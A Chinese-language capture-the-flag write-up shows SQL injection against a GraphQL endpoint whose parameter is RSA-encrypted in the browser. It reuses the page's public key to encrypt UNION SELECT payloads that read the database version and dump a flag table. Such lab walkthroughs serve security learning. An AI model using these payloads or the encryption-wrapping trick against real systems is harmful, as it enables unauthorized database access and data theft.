CTF练习-Web系列-SQLI(二)

CTF练习-Web系列-SQLI(二)

infantsql这道题是前一道题的升级版本,只是在前端调用JSEncrpy第三方库利用公钥进行RSA加密id参数。

解题过程

信息获取

首先对其搜索框进行注入点探测,可以看到id参数进行了加密

然后查看题目前端 JS代码如何加密id参数,可以看到前端调用 JSEncrpy第三方库使用公钥对id参数进行加密处理 。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
function doSubmitForm(){
var pkey = "-----BEGIN PUBLIC KEY-----\n"+
"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDIk4a0KYnqOLmJPxNGQkotihoo\n"+
"994QXmk+7M8WCS5U7kWdhfMqiyjpKzuMaRB8Aydo2bbTNjHhATTRTUIvlpqNzEob\n"+
"CSWuNFc3j3Nlk/I5ySdFo0INzlHnJtbwKQoHon0ctmyffovYNg5Ar8LPz6RbsiA7\n"+
"3Ic4McekZIkdJH08cwIDAQAB\n"+
"-----END PUBLIC KEY-----"
var ajax = new XMLHttpRequest();
ajax.open('POST',"/graphql");
ajax.setRequestHeader("content-type", "application/x-www-form-urlencoded; charset=utf-8");
var id = document.getElementById('id').value;
var encrypt = new JSEncrypt();
encrypt.setPublicKey(pkey);
id = encrypt.encrypt(id);
id = window.btoa(id);
ajax.send("query={getscorewithid(id:\""+id+"\"){ id name score }}");

ajax.onreadystatechange = function () {
if (ajax.readyState==4 && ajax.status==200) {
alert(ajax.responseText);
 }
}
}

接下来的步骤和第一道是一样的,查询出存在的getscorewithname方法及其包含的参数name score

注入测试

在注入过程中只需要使用 上方JS给定的公钥进行加密处理,然后放进请求包中即可进行注入查询

js加密参数代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
const parse = (str) => {
const pkey = `-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDIk4a0KYnqOLmJPxNGQkotihoo
994QXmk+7M8WCS5U7kWdhfMqiyjpKzuMaRB8Aydo2bbTNjHhATTRTUIvlpqNzEob
CSWuNFc3j3Nlk/I5ySdFo0INzlHnJtbwKQoHon0ctmyffovYNg5Ar8LPz6RbsiA7
3Ic4McekZIkdJH08cwIDAQAB
-----END PUBLIC KEY-----`;
const jsEncrypt = new JSEncrypt()
jsEncrypt.setPublicKey(pkey);
const data = jsEncrypt.encrypt(str);
const result = window.btoa(data)
return result;
}
parse("payload")

查询数据库版本

1
2
parse("' UNION SELECT SQLITE_VERSION() '")
// cVlHc25oQ3Y0NGRPV1JEaG56cFBEYWJEZzZqK0VJWjBkdHlnbk9WTU5sQmU4aWVFb3JWekN5clJtb081VFVXT2VWZTBpYjJGUy8va29EZGZSOGJpc0h2UkNJdVJ3bXVKWnVBOUhRTWxKYSs4MS9LR0hiSUpxL0VFY1BqMWFOdFVXbGsrcG9OMzlOL0xrTzBtT1h4T09kanVVVVNPMkZVam9CSnFIRFJrV3VjPQ==
1
2
3
4
5
6
7
query={
getscorewithname(name:"cVlHc25oQ3Y0NGRPV1JEaG56cFBEYWJEZzZqK0VJWjBkdHlnbk9WTU5sQmU4aWVFb3JWekN5clJtb081VFVXT2VWZTBpYjJGUy8va29EZGZSOGJpc0h2UkNJdVJ3bXVKWnVBOUhRTWxKYSs4MS9LR0hiSUpxL0VFY1BqMWFOdFVXbGsrcG9OMzlOL0xrTzBtT1h4T09kanVVVVNPMkZVam9CSnFIRFJrV3VjPQ=="){
name
score
}

}

构造查询数据获取表名flag

1
2
' UNION SELECT (SELECT flag from flag)'
//SzJYbWZzc29ackpCQWY1SFZPS2ZFZjlnbW5mRk5tV3V1dWp3bnhtcTFLTDc5TkhDenZKcXQybm90VmVKM2F1QjdISkVlS0piaDRkdXJyMXVPVmtTRUVGYjN1Q0JUUE9vblFNNlBqVk1qb0RUR1ZBbTd2OGtXbWxseXFkckR2UlhsTStLYXlTcCtJaHRKSjNrSm9jNlNXM3pJTzFBOGNMeEY2ckZsUDYyKzVFPQ==
1
2
3
4
5
6
query={
getscorewithname(name:"SzJYbWZzc29ackpCQWY1SFZPS2ZFZjlnbW5mRk5tV3V1dWp3bnhtcTFLTDc5TkhDenZKcXQybm90VmVKM2F1QjdISkVlS0piaDRkdXJyMXVPVmtTRUVGYjN1Q0JUUE9vblFNNlBqVk1qb0RUR1ZBbTd2OGtXbWxseXFkckR2UlhsTStLYXlTcCtJaHRKSjNrSm9jNlNXM3pJTzFBOGNMeEY2ckZsUDYyKzVFPQ=="){
name
score
}
}

得到flag为:flag{Rea1_flag_1s_Me}

打赏
  • 版权声明: 本博客所有文章除特别声明外,著作权归作者所有。转载请注明出处!
  • Copyrights © 2021-2024 John Doe
  • 访问人数: | 浏览次数:

让我给大家分享喜悦吧!

微信